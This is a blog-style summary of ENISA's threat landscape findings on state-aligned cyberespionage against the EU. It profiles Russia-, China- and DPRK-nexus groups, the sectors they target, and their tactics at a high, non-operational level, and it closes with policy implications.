State-Aligned Cyber Threats Targeting the European Union: An ENISA Threat Landscape Analysis

Breached Company

Breached Company

8 min read
State-Aligned Cyber Threats Targeting the European Union: An ENISA Threat Landscape Analysis
Photo by Christian Lue / Unsplash

1.0 The Evolving Landscape of State-Aligned Threats

Understanding the cyber activities of state-aligned threat actors is indispensable for safeguarding the European Union's security, economic stability, and sovereignty in the digital age. These adversaries conduct sophisticated, persistent campaigns that represent a strategic threat to the EU's public institutions and critical infrastructure. This report analyzes the landscape of these state-aligned threats based on data from the ENISA Threat Landscape report, covering incidents documented between July 2024 and June 2025, to provide actionable intelligence for EU policymakers and defenders.

The reporting period underscores the targeted and impactful nature of state-aligned operations. While constituting a fraction of total incident volume, their potential for strategic disruption remains a primary concern for the Union. Key statistics from the analysis reveal a concentrated threat:

  • 7.2% of total incidents recorded were identified as cyberespionage campaigns, the primary objective of state-aligned activities.
  • 46 distinct state-aligned intrusion sets were observed to be active against targets within the European Union.
  • The top five targeted NIS2 sectors were public administration, transport, digital infrastructure, energy, and health, demonstrating a clear focus on sectors vital to national and EU-level functioning.

A persistent challenge in countering these threats is the difficulty of definitive attribution. The source material highlights that "cyberespionage campaigns are typically documented with a delay spanning from 6 months to more than 4 years," meaning defenders operate with a historical, incomplete picture of the threat. This is reflected in a significant attribution gap, with unidentified intrusion sets accounting for 47% of Russia-nexus, 43% of China-nexus, and 36% of DPRK-nexus activities. This gap hinders the development of precise situational awareness and complicates the formulation of effective, tailored defensive strategies.

This report will now transition to a detailed analysis of the primary threat actor nexuses most actively targeting the European Union.

2.0 Primary Threat Actors: Analysis by Nexus

This section provides a strategic breakdown of the most active state-aligned adversaries targeting the European Union, categorized by geopolitical nexus. This analysis covers their primary targets, operational focus, and notable campaigns observed during the July 2024 to June 2025 reporting period, interpreting their activities through a geopolitical lens.

2.1 Russia-Nexus Adversaries

Intrusion sets aligned with Russia were the most active state-aligned threat actors targeting the EU, conducting sustained cyberespionage campaigns designed to undermine European security and support Moscow's strategic objectives. The most frequently documented groups were APT29, APT28, and Sandworm. Their targeting patterns indicate a concerted intelligence effort to map and disrupt NATO's logistical supply lines to Ukraine and to gauge the political resolve of key Member States like Germany and France.

Russia-Nexus Targeting Focus in the EU

Targeted EU Member States

Poland, France, Germany, Belgium, Greece

Targeted Sectors

Public Administration (Governmental & Diplomatic), Defence, Digital Infrastructure, Transport

Key campaigns observed during this period highlight the diverse and persistent nature of their activities:

  • APT28 conducted widespread spearphishing campaigns with a clear focus on transport, defence, logistics, and political entities to gather intelligence on military logistics and political decision-making.
  • APT29 executed a global spearphishing campaign using rogue RDP files and resumed its well-known "wine tasting event" lure, impersonating EU Member State embassies to target Ministries of Foreign Affairs.
  • Sandworm, known for its disruptive capabilities, maintained an operational mandate focused on the energy sector, illustrated by its targeting of a gas storage entity in an EU Member State.
  • Turla conducted a long-standing cyberespionage campaign narrowly focused on governmental entities within a specific EU Member State, signaling a deep and persistent intelligence requirement.
enisathreatlandscape2025
enisathreatlandscape2025.pdf
5 MB
download-circle

2.2 China-Nexus Adversaries

China-nexus intrusion sets executed a consistent operational mission to acquire strategic data and intellectual property. This demonstrates a systematic, state-directed campaign of industrial espionage designed to close China's technological gap and erode the EU's competitive advantage in key high-tech sectors. The top five most active groups were UNC5221, Mustang Panda, APT41, Flax Typhoon, and Salt Typhoon.

These groups primarily targeted entities in Italy, Germany, France, and Belgium, with a sectorial focus on public administration, transport, civil society, and digital infrastructure. An emerging interest in food manufacturing and agricultural research was also observed. This targeting directly supports Beijing's major policy initiatives, such as the "Made in China 2025" plan and the "Belt and Road" initiative, by collecting sensitive data on technology, trade infrastructure, and EU policy.

A key tactic is the leveraging of compromised edge devices, such as routers and VPN appliances, which are incorporated into vast Operational Relay Box (ORB) networks to obfuscate origins and facilitate follow-on attacks. Campaigns by UNC5221 and Flax Typhoon exemplified this technique, compromising telecommunications providers, manufacturers, and public administration entities across the EU.

2.3 DPRK-Nexus Adversaries

DPRK-nexus intrusion sets pursued a dual mission of cyberespionage and illicit revenue generation to fund the regime. The most active groups targeting the EU were Famous Chollima, Lazarus, and Kimsuky. Their campaigns focused on Belgium, Italy, Germany, and France, with a heavy emphasis on private sector organizations in the Human Resources, financial services (including cryptocurrency), and technology sectors.

A prevalent tactic is the fraudulent IT worker employment scheme, primarily attributed to Famous Chollima. DPRK-nexus operators pose as skilled IT professionals to gain employment within target companies, serving two objectives: enabling cyberespionage through privileged network access and generating revenue through extortion schemes upon contract termination.

2.4 Other State-Aligned Actors of Concern

Beyond the primary nexuses, other state-aligned actors and Private Sector Offensive Actors (PSOAs) targeted EU interests.

  • India-Nexus: The reporting period saw the emergence of groups like Bitter and SideWinder conducting spearphishing campaigns against EU embassies. Their lures, referencing EU-India trade and security dialogues, reflect a strategic interest in EU foreign policy.
  • Iran-Nexus: Groups such as MuddyWater and Charming Kitten conducted low-tempo but highly focused operations against civil society, NGOs, and the Iranian diaspora, aligning with Tehran's objective of monitoring and suppressing dissident activity abroad.
  • Other State Actors: Belarus-linked Ghostwriter continued its targeted spearphishing campaigns against Poland, representing a persistent threat from a neighboring state. In parallel, spillover threats from the Middle East conflict materialized through pro-Houthi intrusion sets OilAlpha and Rare Werewolf, impacting EU entities.
  • Private Sector Offensive Actors (PSOAs): The abuse of sophisticated commercial spyware from Candiru, NSO Group (Pegasus), and Paragon Solutions (Graphite) remains a significant threat. Victims within the EU included Members of the European Parliament (MEPs), government officials, and professionals in various sectors. The proliferation of this commercial spyware market presents a unique challenge, effectively democratizing state-level surveillance capabilities and creating a deniable vector for foreign states to target EU officials, thereby undermining diplomatic confidentiality and political sovereignty.

The effectiveness of these diverse actors relies on an evolving set of tactics, techniques, and procedures.

3.0 Analysis of State-Aligned Tactics, Techniques, and Procedures (TTPs)

Adversary tradecraft is not static; it is a constantly evolving response to our defenses. Analyzing their Tactics, Techniques, and Procedures (TTPs) allows us to move from a reactive posture to a predictive one, anticipating their next move. This section details the common and innovative techniques leveraged by state-aligned groups against EU targets.

Across all intrusion sets, a core set of TTPs remains consistently popular for gaining initial access and executing payloads:

  • Spearphishing: Highly targeted emails remain a primary vector for initial compromise.
  • Exploitation of public-facing services: Adversaries frequently scan for and exploit vulnerabilities in internet-facing applications.
  • Execution via PowerShell: The use of PowerShell for command execution is a common post-compromise technique.
  • Credential brute-forcing and USB-based attacks are also frequently observed.

3.1 Evolving Toolsets and Advanced Techniques

Beyond these common methods, state-aligned actors demonstrated significant innovation to overcome modern defenses.

  • Innovative Access Vectors: Adversaries are developing novel ways to breach secure environments. Notable examples include APT28's nearest-neighbour Wi-Fi attack, which enables network compromise from adjacent physical locations, and GoldenJackal's infiltration of air-gapped systems.
  • Infrastructure Exploitation: A key trend is the compromise of core network devices to gain deep, persistent access. UNC3886 was observed targeting Juniper routers, while Velvet Ant exploited Cisco NX-OS zero-day vulnerabilities, demonstrating a focus on foundational network infrastructure.
  • Programming Language Shifts: To evade signature-based detection, groups are re-implementing their toolsets in less common languages. Both GoldenJackal and APT35 (with its Cyclops backdoor) have transitioned key tools to Go.
  • Evasion and Stealth: Advanced anti-detection mechanisms are being integrated into malware, including sandbox detection and the abuse of legitimate, signed software to conceal malicious activity.
  • Expanded Linux Targeting: Adversaries have developed malware specifically for Linux, a growing target in cloud environments. Families such as WolfsBane, FireWood, and POOLRAT are designed for these systems.
  • In-Memory Deployment: To minimize their forensic footprint, adversaries are increasingly using in-memory payloads that are never written to disk. This technique was observed in campaigns by BackdoorDiplomacy and with APT29's GRAPELOADER malware.

These technical TTPs are deployed within broader strategic patterns that define how adversaries interact with and exploit the EU's unique geopolitical landscape.

4.0 Strategic Operational Patterns

Beyond specific technical procedures, state-aligned actors exhibit broader strategic patterns in their operations against the European Union. These patterns reveal how adversaries perceive and exploit the EU's political, digital, and geographical environment to their advantage.

4.1 The EU as Both Target and Lure

Threat actors frequently impersonate EU institutions, officials, and events to enhance the credibility of their social engineering campaigns. By leveraging the authority associated with the EU brand, adversaries significantly increase the likelihood that targets will engage with malicious content. This tactic was observed across multiple campaigns:

  • APT29 crafted spearphishing emails that impersonated an EU Ministry of Foreign Affairs and referenced fictitious diplomatic events.
  • Callisto developed highly tailored phishing pages designed to mimic official EU institutional correspondence.
  • Kimsuky used EU-branded diplomatic meeting invitations containing malicious macros as a lure.

4.2 Exploitation of EU-Based Infrastructure

Adversaries routinely compromise and leverage EU-based servers and devices to obfuscate their origins and support follow-up attacks. This convergence of state-aligned and criminal infrastructure complicates attribution, as demonstrated by China-nexus groups' extensive use of Operational Relay Box (ORB) networks incorporating compromised devices across the EU. Similarly, the Russia-nexus group Turla configured its backdoor to use compromised WordPress installations hosted within the EU for command and control, while groups like APT29 and Sandworm were observed using commercial cybercrime proxy networks.

4.3 Complex Targeting Geographies

State-aligned actors adopt complex targeting strategies that exploit the EU's global presence and its status as an international hub. Two distinct patterns were observed:

  1. Attacks on EU entities located outside EU territory: Adversaries target the EU's diplomatic missions and commercial operations in third countries, which may operate in more permissive security environments. Campaigns by APT29 against EU diplomatic missions abroad exemplify this approach.
  2. Attacks on non-EU entities operating within EU territory: Threat actors target foreign diplomatic missions and international organizations based within the EU. Charming Kitten leveraged journalist personas to approach Middle Eastern embassy staff in European capitals, while MirrorFace was observed targeting entities within the EU, likely as a vector to reach its primary Japanese targets.

These strategic patterns demonstrate a sophisticated understanding of the EU's operational environment, allowing adversaries to exploit trust, geography, and infrastructure to achieve their intelligence objectives.

5.0 Conclusion: Key Findings and Strategic Implications

This analysis confirms that state-aligned cyber activities are a high-impact, persistent threat to the European Union. While Russia-nexus groups remain the most active, adversaries from China, the DPRK, and other nexuses conduct continuous cyberespionage campaigns targeting the EU’s critical sectors and public institutions. These actors demonstrate growing sophistication, exploiting EU infrastructure and strategically weaponizing the EU's own brand as a social engineering lure. State-aligned cyberespionage is an enduring strategic challenge that directly threatens the Union's political and economic interests.

The findings presented in this report carry several key strategic implications for the European Union's cybersecurity policy and defensive posture:

  • The EU Brand is a Strategic Asset and an Attack Vector: Adversaries consistently weaponize the EU's identity to enhance their social engineering campaigns. This necessitates a proactive strategy to defend the EU's brand, including robust digital identity verification for official communications and targeted education for personnel at high risk of impersonation attacks.
  • The EU's Global Footprint is a Distributed Attack Surface: The Union's expansive diplomatic and economic presence constitutes a distributed and often softer target for adversaries. Securing the EU's digital domain requires extending robust cybersecurity postures to its global outposts, treating them as forward-deployed sensors and potential entry points into core networks.
  • Adversary Use of EU Infrastructure Erodes Digital Trust: The compromise of EU-based servers by foreign adversaries complicates attribution, undermines trust in the regional digital ecosystem, and allows attackers to stage operations from within the Union's borders. Securing this infrastructure is critical not only for direct defense but also to prevent the EU from being used as a launchpad for malicious activities worldwide.

Read more